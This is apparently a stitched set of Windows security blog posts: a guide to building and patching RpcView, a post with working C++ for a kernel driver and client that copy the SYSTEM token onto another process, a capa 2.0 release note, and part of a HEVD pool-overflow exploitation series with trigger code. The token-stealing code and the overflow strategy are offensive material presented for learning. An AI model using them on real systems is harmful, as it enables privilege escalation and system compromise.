mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:
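If you would rather script that byte swap than click around in a hex editor, a small helper along these lines would do it (an illustrative sketch; the old and new values are the ones discussed above, the file names are assumed to be in the current directory, and you should obviously keep a backup of the DLLs):

#include <cstdint>
#include <cstdio>
#include <cstring>
#include <fstream>
#include <iterator>
#include <string>
#include <vector>

// Finds the little-endian bytes of a known runtime version inside the DLL and
// overwrites them with the bytes of our own version.
bool PatchRuntimeVersion(const std::string &Path, uint64_t OldVersion,
                         uint64_t NewVersion) {
  std::ifstream In(Path, std::ios::binary);
  std::vector<char> Data((std::istreambuf_iterator<char>(In)),
                         std::istreambuf_iterator<char>());
  if (Data.empty()) {
    printf("Could not read %s.\n", Path.c_str());
    return false;
  }

  const std::string Haystack(Data.data(), Data.size());
  const std::string Needle(reinterpret_cast<const char *>(&OldVersion),
                           sizeof(OldVersion));
  const size_t Offset = Haystack.find(Needle);
  if (Offset == std::string::npos) {
    printf("Pattern not found in %s.\n", Path.c_str());
    return false;
  }

  memcpy(Data.data() + Offset, &NewVersion, sizeof(NewVersion));
  std::ofstream Out(Path, std::ios::binary | std::ios::trunc);
  Out.write(Data.data(), Data.size());
  return true;
}

int main() {
  // 10.0.19041.1052 -> 10.0.19041.1081 (see the conversion above).
  PatchRuntimeVersion("RpcCore4_64bits.dll", 0xA00004A61041CULL,
                      0xA00004A610439ULL);
  PatchRuntimeVersion("RpcCore4_32bits.dll", 0xA00004A61041CULL,
                      0xA00004A610439ULL);
  return 0;
}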

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is a section which is supposed to list all the procedures or functions exposed by an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries: Microsoft publishes their associated PDB (Program DataBase) files.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that, unlike other tools, RpcView is not able to download the PDB files automatically, so we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Stealing Tokens In Kernel Mode With A Malicious Driver

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to steal the access token of a SYSTEM process and assign it to a process of your choosing. However, this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by an _EPROCESS structure, and these structures are linked together in a doubly linked list. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting an actual kernel mode vulnerability, I wrote a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes a struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct
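For illustration, the input structure boils down to something like the following sketch (the member names here are mine, not necessarily those used in the linked repository):

// Hypothetical layout of the IOCTL input buffer: two PIDs.
typedef struct _STEAL_TOKEN_INPUT
{
    unsigned long SourcePid;   // PID of the process to steal the token from (e.g. 4 for System)
    unsigned long TargetPid;   // PID of the process to elevate
} STEAL_TOKEN_INPUT, *PSTEAL_TOKEN_INPUT;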

The driver finds the _EPROCESS structure for each PID, locates the Token members, and copies the token of the source process over the token of the process to elevate.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code
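A hedged sketch of that user mode logic is shown below. The device name and IOCTL code are placeholders, since the real values are defined by the driver in the linked repository; the struct mirrors the sketch above.

#include <windows.h>
#include <winioctl.h>
#include <stdio.h>
#include <stdlib.h>

// Placeholder values - the real symbolic link name and IOCTL code come from the driver.
#define DEVICE_NAME        L"\\\\.\\TokenStealer"
#define IOCTL_STEAL_TOKEN  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

typedef struct _STEAL_TOKEN_INPUT
{
    unsigned long SourcePid;
    unsigned long TargetPid;
} STEAL_TOKEN_INPUT;

int wmain(int argc, wchar_t* argv[])
{
    if (argc != 3)
    {
        wprintf(L"Usage: %s <PID to steal from> <PID to elevate>\n", argv[0]);
        return 1;
    }

    // Open a handle to the driver's device object by name.
    HANDLE hDevice = CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
                                 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        wprintf(L"Failed to open device: %lu\n", GetLastError());
        return 1;
    }

    STEAL_TOKEN_INPUT input = { 0 };
    input.SourcePid = (unsigned long)_wtoi(argv[1]);
    input.TargetPid = (unsigned long)_wtoi(argv[2]);

    // Hand both PIDs to the driver via the exposed IOCTL.
    DWORD bytesReturned = 0;
    if (!DeviceIoControl(hDevice, IOCTL_STEAL_TOKEN, &input, sizeof(input),
                         NULL, 0, &bytesReturned, NULL))
    {
        wprintf(L"DeviceIoControl failed: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}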

The Driver Code

The code for the token copying is pretty straightforward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token
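To make the flow concrete, here is a heavily simplified sketch of that kernel side logic, using the hardcoded 0x4b8 offset from above (no IOCTL plumbing or error handling niceties - just the core idea, and only valid on builds where that offset is correct):

#include <ntifs.h>

// Offset of the Token member inside _EPROCESS on the test machine (Windows 10 20H2).
#define TOKEN_OFFSET 0x4b8

NTSTATUS StealToken(ULONG SourcePid, ULONG TargetPid)
{
    PEPROCESS SourceProcess = NULL;
    PEPROCESS TargetProcess = NULL;

    // Resolve both PIDs to their _EPROCESS structures.
    NTSTATUS Status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)SourcePid, &SourceProcess);
    if (!NT_SUCCESS(Status))
    {
        return Status;
    }

    Status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)TargetPid, &TargetProcess);
    if (!NT_SUCCESS(Status))
    {
        ObDereferenceObject(SourceProcess);
        return Status;
    }

    // Read the _EX_FAST_REF Token value from the source process and write it
    // over the Token value of the target process.
    ULONG_PTR SourceToken = *(ULONG_PTR*)((ULONG_PTR)SourceProcess + TOKEN_OFFSET);
    *(ULONG_PTR*)((ULONG_PTR)TargetProcess + TOKEN_OFFSET) = SourceToken;

    ObDereferenceObject(SourceProcess);
    ObDereferenceObject(TargetProcess);

    return STATUS_SUCCESS;
}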

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, which is always 4. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

capa 2.0: Better, Faster, Stronger

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and check out the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in highly optimized routines, such as memcpy, to opt in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license), we have spent significant time creating a comprehensive FLIRT signature set for the common malware analysis use case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpkg and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here, starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining that information leak with the bug outlined in this post, a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why, in my estimation, the scope of pool corruption techniques in the age of the segment heap has lessened compared to the days of Windows 7.

Due to the recent release of Windows 11, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out any new technology in an enterprise, vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel and toward either data-only style attacks or more novel techniques to bypass VBS and HVCI. This is the direction I hope to take my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is set by a preprocessor directive to 16 on a 64-bit Windows machine, which we are testing from. We now know that the pool chunk that will be allocated by the call to ExAllocatePoolWithTag within TriggerBufferOverflowNonPagedPoolNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack the pool overflow code onto the end, after the for loop which does the parsing to extract the base address of HEVD.sys. This code, which can be seen below, sends a buffer of 50 bytes into the 16-byte pool chunk. The IOCTL to reach the TriggerBufferOverflowNonPagedPoolNx function is 0x0022204b.
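The trigger itself boils down to a single DeviceIoControl call. A minimal sketch, assuming hDriver is the HEVD device handle obtained exactly as in Part 1:

#include <windows.h>
#include <string.h>

// IOCTL code for TriggerBufferOverflowNonPagedPoolNx, as documented above.
#define IOCTL_BUFFER_OVERFLOW_NONPAGEDPOOLNX 0x0022204b

void TriggerPoolOverflow(HANDLE hDriver)
{
    // 50 bytes copied into a 16-byte NonPagedPoolNx chunk = out-of-bounds write.
    BYTE payload[50];
    memset(payload, 0x41, sizeof(payload));

    DWORD bytesReturned = 0;
    DeviceIoControl(hDriver, IOCTL_BUFFER_OVERFLOW_NONPAGEDPOOLNX,
                    payload, sizeof(payload),
                    NULL, 0, &bytesReturned, NULL);
}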

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on the call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again occurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question now is: with a kASLR bypass in hand, how do we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot of code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap, when exploiting the kLFH specifically, is to find objects that are the same size as the vulnerable object, contain an interesting member, can be allocated from user mode, and are allocated on the same pool type as the vulnerable object. We can recall that the vulnerable object was 16 bytes in size. The goal now is to look at the source code of the driver to determine if there isn’t a useful object we can allocate which will meet all of the parameters above. Note again that the toughest part of pool exploitation is finding worthwhile objects.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h which are useful to us. As the name suggests, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver, look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects into the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well as several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELPER_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelperNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the functions defined in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELPER_OBJECT_IO, and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

